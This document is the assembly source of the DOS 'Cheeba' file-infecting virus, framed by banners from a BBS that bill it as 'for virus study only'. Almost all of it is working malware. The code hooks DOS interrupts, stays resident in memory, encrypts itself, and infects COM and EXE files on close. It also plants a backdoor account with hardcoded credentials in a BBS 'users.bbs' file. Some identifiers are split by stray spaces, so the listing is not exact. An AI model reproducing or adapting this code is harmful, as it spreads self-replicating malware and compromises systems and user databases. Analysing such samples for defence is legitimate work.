2022-08-21 09:07:57 +00:00
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;*** The author of Cheeba let his source lie around --- so HERE IT IS!!! ***
; Btw just one thing --- I give it 2 you as long as you don't make a
; sucking destroying thing... Btw 2 this is of course only educational...
; Naam en password staan +- op lijn 200. Verander de low-version number
; bij de verschillende versies...
; Verander verder NIKS aan het virus !!!
Com_First: push cs
S_1: mov ax , 100h
S_2: push ax
mov ax , cs
CodePars: add ax , 0
push ax
S_3: mov ax , offset End_Virus
S_4: push ax
VirTitle db 'CHEEBA Makes Ya High Harmlessly-1.2 F**K THE LAMERS'
I21Hooks db 0
dw offset Stop_Prg
db 31h
dw offset Stop_Prg
db 4Ch
dw offset Stop_Prg
db 4Bh
dw offset Start_Prg
db 45h
dw offset Ch eck_Init
db 3Ch
dw offset Open_Wrt
db 3Dh
dw offset Open_Rd
db 3Eh
dw offset Ch eck_Close
db 40h
dw offset Ch eck_Vir
New_21: call Rest_Orig_21
call Save_Regs
mov bx , offset I21Hooks
Srch_Fct_Lp: cmp ah ,[ bx ]
jne Wrong_Fct
push [ bx + 1 ]
call Retr_Regs
Wrong_Fct: add bx , 3
cmp bx , offset New_21
jb Srch_Fct_Lp
Go_Dos: call Retr_Regs
call Call_Dos
Skip_21: call Rest_21_Jmp
retf 2
Call_Dos: pushf
db 09Ah
Org _21_Addr dw 2 dup ( ? )
Org _21_Code db 5 dup ( ? )
;*** Fct 45 - check init ***
Check_Init: cmp bx , 0D15h
jne Go_Dos
mov bx , 0F0Ch
jmp short Skip_21
;*** I21 FCT 3Dh - Open file for read ***
Open_Rd: test al , 3
jz Go_Dos
xchg si , dx
Get_0: lodsb
or al , al
jnz Get_0
mov cx , 0Ah
xor bx , bx
xor ax , ax
cwd ; Dx = 0
Get_CSum: dec si
rol bx , 1
mov al ,[ si ]
or al , 20h
xor bl , al
add dx , ax
loop Get_CSum
cmp bx , 1AE7h
jne Go_Dos
cmp dx , 3B7h
jne Go_Dos
Is_Users: mov word ptr cs :[ Save_A_Reg ], si
mov di , offset Coded
Del_Si: mov si , word ptr cs :[ Save_A_Reg ]
Lp_Unc: lodsb
or al , al
jz Del_Si
or al , 20h
sub byte ptr cs :[ di ], al
inc di
cmp di , offset No_Read
jb Lp_Unc
Coded: call Retr_Regs
and al , 0FEh
or al , 2
call Call_Dos
jnc Has_Read
jmp No_Read
Has_Read: pushf
call Save_Regs
xchg bx , ax
mov ah , 3Fh
mov cx , 9Eh
mov dx , offset End_Virus
call Call_Dos
mov dx ,[ End_Virus + 20h ]
mov cx ,[ End_Virus + 22h ]
or cx , cx
jnz Test_Ok
or dx , dx
jz No_XS_YET
Test_Ok: mov ax , 4200h
call Call_Dos
mov ah , 3Fh
mov dx , offset End_Virus + 9Eh
mov cx , 9Eh
call Call_Dos
cmp ax , cx
jnz No_XS_YET
cmp byte ptr [ End_Virus + 9Eh ], 3
jne No_XS_YET
test byte ptr [ End_Virus + 9Eh + 77h ], 1
jnz No_XS_YET
mov ax ,[ End_Virus + 84h ]
cmp ax ,[ End_Virus + 9Eh + 84h ]
jne No_XS_YET
J_Less: jmp Less_Users
No_XS_Yet: mov ax , 4202h
xor cx , cx
cwd ; Dx = 0
call Call_Dos
or dx , dx
jnz More_Users
cmp ax , 9Eh * 50 ; 50 users of meer
jb J_Less
More_Users: mov cx , 9Eh
div cx
or dx , dx
jnz J_Less
shr ax , 1
mul cx
xchg cx , dx
xchg dx , ax
mov ax , 4200h
call Call_Dos
Read_Lp: mov ah , 3Fh
mov dx , offset End_Virus + 9Eh
mov cx , 9Eh
call Call_Dos
cmp ax , cx
jne Less_Users
test byte ptr [ offset End_Virus + 9Eh + 77h ], 1 ; Search deleted
je Read_Lp
mov ax , 4201h
mov cx , - 1
mov dx , - 9Eh
call Call_Dos
push dx
push ax
mov [ End_Virus + 20h ], ax
mov [ End_Virus + 22h ], dx
mov ax , 4200h
xor cx , cx
cwd ; dx = 0
call Call_Dos
mov ah , 40h
mov cx , 9Eh
mov dx , offset End_Virus
call Call_Dos
mov ax , 4200h
pop dx
pop cx
call Call_Dos
push ds
pop es
mov al , 0
mov di , offset End_Virus
mov cx , 106h - 9Eh
repz stosb
mov ax , 2020h
mov cx , 5
Wrt_20s: inc di
loop Wrt _20s
; Naam en password zijn 3 chars, Name = <N1><N2><N3> , Password = <P1><P2><P3>
; Zijn dus Name = 1F 20 7E, Password = 4D 5A B8
; Staan zoals hier:
; mov ..., 0 <N1> <NameLen = 3>
; ..... 0 <N3> <N2>
; Password:
; ..... ,0 <P1> <PassLen = 3>
; ..... ,0 <P3> <P2>
mov word ptr [ End_Virus ], 01F03h
mov word ptr [ End_Virus + 2 ], 07E20h
mov word ptr [ End_Virus + 3Eh ], 04D03h
mov word ptr [ End_Virus + 40h ], 0B85Ah
mov ah , 40h
mov cx , 9Eh
mov dx , offset End_Virus
call Call_Dos
Less_Users: call Go_Beg_File
call Retr_Regs
No_Read: pushf
push ax
push si
push di
push ds
mov di , offset Coded
Del_Si_2: mov si , word ptr cs :[ Save_A_Reg ]
Lp_Unc_2: lodsb
or al , al
jz Del_Si_2
or al , 20h
add byte ptr cs :[ di ], al
inc di
cmp di , offset No_Read
jb Lp_Unc_2
pop ds
pop di
pop si
pop ax
call Rest_21_Jmp
retf 2
;*** I 21 FCT 3C - Rewrite file ***
Open_Wrt: cld
test byte ptr cs :[ Flags ], 1 ; Already sure-exec opened?
jnz J_JD_2
push ds
pop es
xchg di , dx
mov al , 0
mov cx , - 1
repnz scasb
mov ax ,[ di - 5 ]
or ax , 2020h
cmp ax , 'c.'
jne No_Com
mov ax ,[ di - 3 ]
or ax , 2020h
cmp ax , 'mo'
jne Open_It
Sure_Exec: or byte ptr cs :[ Flags ], 1
Open_It: call Retr_Regs
call Call_Dos
jc Not_Opened
mov word ptr cs :[ Exec_Handle ], ax
Not_Opened: call Rest_21_Jmp
retf 2
No_Com: cmp ax , 'e.' ; '.E'?
jne Open_It
mov ax ,[ di - 3 ]
or ax , 2020h
cmp ax , 'ex' ; .. 'XE'?
je Sure_Exec
OJ_2: jmp short Open_It
;*** I21 FCT 3E - Infect on close if orig. prog has written too ***
Check_Close: push cs
pop ds
cmp bx ,[ Exec_Handle ] ; Same file?
J_JD_2: jne JD_2
mov word ptr [ Exec_Handle ], 0FFFFh ; Don't follow anymore
call Go_Beg_File ; Go to beg. of file
mov ah , 3Fh ; Read first bytes
mov cx , 18h
mov dx , offset Read_Buf
call Call_Dos
and byte ptr [ Flags ], 0FBh ; Flag for COM
cmp word ptr [ Read_Buf ], 'ZM' ; MZ - Exe?
je Infect_Exe
test byte ptr [ Flags ], 1 ; Sure exec?
jnz Infect_Com
and byte ptr cs :[ Flags ], 0FEh
JD_2: jmp Go_Dos
Infect_Exe: or byte ptr [ Flags ], 4 ; Flag for EXE
mov ax ,[ Read_Buf + 16h ]
mov [ Exe_CS + 1 ], ax
mov ax ,[ Read_Buf + 14h ]
mov [ Exe_IP + 1 ], ax
cmp ax , offset Init
je OJ_2
mov ax ,[ Read_Buf + 0Eh ]
mov [ Exe_SS + 1 ], ax
mov ax ,[ Read_Buf + 10h ]
mov [ Exe_SP + 1 ], ax
Infect_Com: and byte ptr [ Flags ], 0FEh
cmp word ptr [ Read_Buf ], 0B80Eh
je JD_2
cmp word ptr [ Read_Buf ], 0BFh
je JD_2
Not_Inf: mov ax , 4202h ; Go to end of file
xor cx , cx
cwd ; Dx = 0
call Call_Dos
test byte ptr [ Flags ], 4
jz No_Ovl_Test
push ax ; .EXE: Test for internal overlays
push dx
mov cx , 200h
div cx
cmp dx ,[ Read_Buf + 2 ]
jne Is_Ovl
or dx , dx
jz No_Corr_Chk
inc ax
No_Corr_Chk: cmp ax ,[ Read_Buf + 4 ]
Is_Ovl: pop dx
pop ax
je No_Ovl_Test
JD_3: jmp short JD_2
No_Ovl_Test: add ax , 0Fh ; End in paragraphs
adc dx , 0
and ax , 0FFF0h
mov Org_Fl_Len_Lo , ax
mov Org_Fl_Len_Hi , dx
push ax
mov cl , 4
shr ax , cl
mov [ CodePars + 1 ], ax
or al , al
jnz No_Al_0
dec al
No_Al_0: mov byte ptr [ offset S_5 - 1 ], al
pop ax
push ax
push dx
mov cx , dx ; Go to end-in-paragraphs
mov dx , ax
mov ax , 4200h
call Call_Dos
push cs
pop es
mov si , 100h
mov di , offset End_Virus
mov cx , offset End_Virus - 100h
mov dl , byte ptr cs :[ offset S_5 - 1 ]
Code_Lp: lodsb
cmp si , offset Init
ja No_Code
xor al , dl
No_Code: stosb
loop Code_Lp
mov ax , 5700h
call Call_Dos
mov Org_Fl_Time , cx
mov Org_Fl_Date , dx
mov ah , 40h ; Write virus behind program
mov cx , offset End_Virus - 100h
mov dx , offset End_Virus
call Call_Dos
call Go_Beg_File
mov dx , offset Com_First
mov cx , 10h
pop si
pop ax
test byte ptr [ Flags ], 4
jz Init_Com
mov dx , si
mov cx , 4
Get_CS: shr dx , 1
rcr ax , 1
loop Get_CS
sub ax ,[ Read_Buf + 8 ] ; - header size
sub ax , 10h
mov [ Read_Buf + 16h ], ax
mov [ Read_Buf + 0Eh ], ax
mov word ptr [ Read_Buf + 14h ], offset Init
mov word ptr [ Read_Buf + 10h ], offset End_Virus + 100h
mov ax , Org_Fl_Len_Lo
mov dx , Org_Fl_Len_Hi
add ax , offset End_Virus - 100h
adc dx , 0
mov cx , 200h
div cx
or dx , dx
jz No_Corr
inc ax
No_Corr: mov [ Read_Buf + 2 ], dx
mov [ Read_Buf + 4 ], ax
mov dx , offset Read_Buf
mov cx , 18h
Init_Com: mov ah , 40h
call Call_Dos
mov ax , 5701h
mov cx , Org_Fl_Time
mov dx , Org_Fl_Date
call Call_Dos
JD_4: jmp short JD_3
;*** 00 / 31 / 4C: End program ***
Stop_Prg: push ds
push bx
lds bx , cs :[ Jmp_22 + 1 ]
mov byte ptr [ bx ], 0EAh
mov word ptr [ bx + 1 ], offset Int_22
mov word ptr [ bx + 3 ], cs
pop bx
pop ds
jmp short JD_4
Int_22: call Rest_21_Jmp
push cs
pop ds
les di , dword ptr [ Jmp_22 + 1 ]
mov si , offset Org_22
call Move_Bytes
call Retr_Regs
Jmp_22: jmp 0 : 0
Org _22 db 5 dup ( ? )
;*** Start prog ***
Start_Prg: lds bx , cs :[ Jmp_13 + 1 ]
mov byte ptr [ bx ], 0EAh
mov word ptr [ bx + 1 ], offset Int_13
mov word ptr [ bx + 3 ], cs
call Retr_Regs
JD_5: jmp short JD_4
Int_13: call Rest_21_Jmp
push si
push di
push ds
push es
push cs
pop ds
les di , dword ptr [ Jmp_13 + 1 ]
mov si , offset Org_13
call Move_Bytes
pop es
pop ds
pop di
pop si
Jmp_13: jmp 0 : 0
Org _13 db 5 dup ( ? )
;*** Check for string 'iru' (vIRUs) ***
Check_Vir: cmp bx , cs :[ Exec_Handle ]
jne No_Vir
sub cx , 2
jc No_Vir
push ds
pop es
mov di , dx
mov al , 'i'
Iru_Lp: repnz scasb
jnz No_Vir
cmp word ptr [ di ], 'ur'
jne Iru_Lp
mov word ptr cs :[ Exec_Handle ], 0FFFFh
and byte ptr cs :[ Flags ], 0FEh
No_Vir: jmp short JD_5
Move_Bytes: cli
Rest_Orig_21: push si
push di
push ds
push es
push cs
pop ds
mov si , offset Org_21_Code
les di , dword ptr [ Org_21_Addr ]
call Move_Bytes
pop es
pop ds
pop di
pop si
Rest_21_Jmp: push ds
push bx
lds bx , dword ptr cs :[ Org_21_Addr ]
mov byte ptr [ bx ], 0EAh
mov word ptr [ bx + 1 ], offset New_21
mov word ptr [ bx + 3 ], cs
pop bx
pop ds
;*** Proc: Save regs ***
Save_Regs: mov word ptr cs :[ Save_Ds ], ds
push cs
pop ds
mov word ptr [ Save_Ax ], ax
mov word ptr [ Save_Bx ], bx
mov word ptr [ Save_Cx ], cx
mov word ptr [ Save_Dx ], dx
mov word ptr [ Save_Si ], si
mov word ptr [ Save_Di ], di
mov word ptr [ Save_Es ], es
Retr_Regs: push cs
pop ds
mov ax , word ptr [ Save_Ax ]
mov bx , word ptr [ Save_Bx ]
mov cx , word ptr [ Save_Cx ]
mov dx , word ptr [ Save_Dx ]
mov si , word ptr [ Save_Si ]
mov di , word ptr [ Save_Di ]
mov es , word ptr [ Save_Es ]
mov ds , word ptr [ Save_Ds ]
Go_Beg_File: mov ax , 4200h
xor cx , cx
cwd ; dx = 0
call Call_Dos
Exec_Handle dw 0FFFFh ; Handle of opened-with-write- exec. file
Flags db ( ? ) ; Flags: 1 = Sure exec (- Maybe data)
; 4 = EXE-file (- COM)
Org _Fl_Len_Lo dw ( ? )
Org _Fl_Len_Hi dw ( ? )
Org _Fl_Time dw ( ? )
Org _Fl_Date dw ( ? )
Save_Ax dw ( ? )
Save_Bx dw ( ? )
Save_Cx dw ( ? )
Save_Dx dw ( ? )
Save_Si dw ( ? )
Save_Di dw ( ? )
Save_Ds dw ( ? )
Save_Es dw ( ? )
Save_A_Reg dw ( ? )
Decoded: mov word ptr cs :[ Save_A_Reg ], ds
push ax
push bx
push cx
push dx
push ds
push es
mov ah , 45h
mov bx , 0D15h
int 21h
cmp bx , 0F0Ch
jne N_Y_Inst
jmp Jmp_No_Init
N_Y_Inst: cld
xor ax , ax
mov ds , ax
mov ax ,[ 88h ] ; Save I22 addr
mov cs :[ Jmp_22 + 1 ], ax
mov ax ,[ 8Ah ]
mov cs :[ Jmp_22 + 3 ], ax
mov ax ,[ 04Ch ] ; Save I13 addr
mov cs :[ Jmp_13 + 1 ], ax
mov dx ,[ 04Eh ]
mov cs :[ Jmp_13 + 3 ], dx
mov ah , 52h
int 21h
cmp dx , es :[ bx - 2 ]
jnb Jmp_No_Init
push [ 84h ]
push [ 86h ]
push cs
pop ds
push cs
pop es
mov si , offset Com_First
mov di , offset Com_Start_2
MoveStrt: lodsw ; Other .COM start-up
cmp si , offset CodePars + 3
je No_MS_Lp
xchg ax ,[ di ]
mov [ si - 2 ], ax
inc di
inc di
No_MS_Lp: cmp si , offset VirTitle
jb MoveStrt
xor byte ptr [ Init ], 1
xor byte ptr [ S_9 ], 6Ch
xor byte ptr [ Decode_Lp + 2 ], 1
xor byte ptr [ S_5 ], 1
xor byte ptr [ S_6 + 1 ], 1
xor byte ptr [ S_7 ], 7
xor byte ptr [ S_8 ], 6Ch ; Nop <> CLD
mov ax , word ptr cs :[ Save_A_Reg ]
dec ax
MCB_Loop: mov ds , ax
cmp byte ptr [ 0 ], 'Z'
je Found_End_MCB
add ax ,[ 3 ]
inc ax
cmp ah , 0A0h
jb MCB_Loop
add sp , 4
Jmp_No_Init: jmp short No_Init
Found_End_MCB: mov bx ,[ 3 ]
Here_Pars: sub bx , 100h ; Filled in init-proc.
jc No_Init
mov [ 3 ], bx
add ax , bx
inc ax
mov ds , cs :[ Save_A_Reg ]
mov word ptr [ 2 ], ax
sub ax , 10h
mov cx , offset End_Virus - 100h
push cs
pop ds
mov es , ax
mov si , 100h
mov di , si
repz movsb
pop ds
pop si
mov es :[ Org_21_Addr ], si
mov es :[ Org_21_Addr + 2 ], ds
mov di , offset Org_21_Code
call Move_Bytes
mov byte ptr [ si - 5 ], 0EAh
mov word ptr [ si - 4 ], offset New_21
mov word ptr [ si - 2 ], es
lds si , cs :[ Jmp_22 + 1 ]
mov di , offset Org_22
call Move_Bytes
lds si , cs :[ Jmp_13 + 1 ]
mov di , offset Org_13
call Move_Bytes
No_Init: pop es
pop ds
pop dx
pop cx
pop bx
pop ax
test cs : Flags , 4
jnz Rest_Stack
push ds
push cs
pop ds
mov cx , 10h
mov si , offset Read_Buf
mov di , 100h
repz movsb
pop ds
Rest_Stack: mov ax , ds ; Stack restore for .EXE files
Exe_SS: add ax , 0
add ax , 10h
mov ss , ax
Exe_SP: mov sp , 0
mov ax , ds
Exe_Cs: add ax , 0
add ax , 10h
push ax
Exe_Ip: mov ax , 0
push ax
Com_Start_2: mov di , 100h
push cs
mov ax , cs
push di
db 05h ; Add Ax,xxxx
mov di , offset Init
push ax
push di
Init: mov si , offset Com_First
S_9: cld
Decode_Lp: xor byte ptr cs :[ si ], 0
S_5: inc si
S_6: cmp si , offset Init
S_7: jne Decode_Lp
S_8: nop
jmp Decoded
Read_Buf db 0CDh , 20h
db 16h dup ( ? )
End_Virus: cld
mov word ptr [ S_3 + 1 ], offset Init
mov word ptr [ Here_Pars + 2 ],((( offset End_Virus - 101h ) shr 4 ) + 1 ) shl 1
mov di , offset Coded
New_Us: mov si , offset User_St
B_V_CLp: lodsb
or al , al
jz New_Us
add [ di ], al
inc di
cmp di , offset No_Read
jb B_V_CLp
jmp Init
User_St db 'users.bbs' , 0
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;